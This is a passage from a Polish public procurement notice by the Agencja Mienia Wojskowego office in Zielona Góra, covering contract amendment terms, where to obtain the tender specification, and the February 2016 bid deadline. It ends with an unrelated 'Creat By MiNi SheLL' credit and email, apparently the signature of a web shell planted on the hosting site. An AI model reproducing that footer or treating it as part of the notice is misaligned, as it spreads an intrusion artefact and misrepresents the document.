1)	Nastąpi ustawowa zmiana stawki podatku VAT powodująca zmniejszenie/zwiększenie kosztów wykonania umowy po stronie Wykonawcy, wówczas Zamawiający dopuszcza możliwość zwiększenia/zmniejszenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę.
2)	Wystąpią obiektywne przyczyny uniemożliwiające wykonanie usługi we wskazanym w zleceniu terminie wówczas możliwe będzie przedłużenie terminu realizacji zlecenia o czas wynikający z tych obiektywnych przyczyn. W przypadku zaistnienia takiej sytuacji zleceniobiorca ma obowiązek poinformować zleceniodawcę o opóźnieniu w wykonaniu zlecenia, w terminie nie późniejszym niż termin realizacji zlecenia, podając przyczynę opóźnienia i ją dokumentując a także wskazując ostateczny termin realizacji zlecenia. Decyzja o przedłużeniu terminu realizacji zlecenia ma charakter uznaniowy i przysługuje zleceniodawcy (Zamawiającemu). Przez obiektywne przyczyny w opóźnieniu realizacji zlecenia należy rozumieć m.in. takie okoliczności jak: brak możliwości dokonania wizji w terenie, choroba zleceniobiorcy, opóźnienie związane z uzyskaniem dokumentów będących załącznikiem do wykazu.
2. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wam.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AGENCJA MIENIA WOJSKOWEGO
w Warszawie
Oddział Regionalny Zielona Góra
Al. Zjednoczenia 104
65-120 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2016 godzina 12:00, miejsce: AGENCJA MIENIA WOJSKOWEGO
w Warszawie
Oddział Regionalny Zielona Góra
Al. Zjednoczenia 104
65-120 Zielona Góra
pok. nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com